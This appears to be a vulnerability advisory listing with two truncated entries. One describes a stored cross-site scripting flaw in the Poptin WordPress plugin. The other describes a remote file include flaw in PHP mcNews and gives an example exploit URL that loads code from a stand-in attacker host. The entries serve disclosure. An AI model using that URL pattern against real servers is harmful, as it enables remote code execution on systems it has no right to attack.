CVE-2023-4961 Poptin <= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

The Poptin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'poptin-form' shortcode in versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with...

PHP mcNews &lt;= 1.3 (skinfile) Remote File Include Vulnerability

No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/mcNews/admin/header.php?skinfile=http://hackerbox/ milw0rm.com 2005-03-07...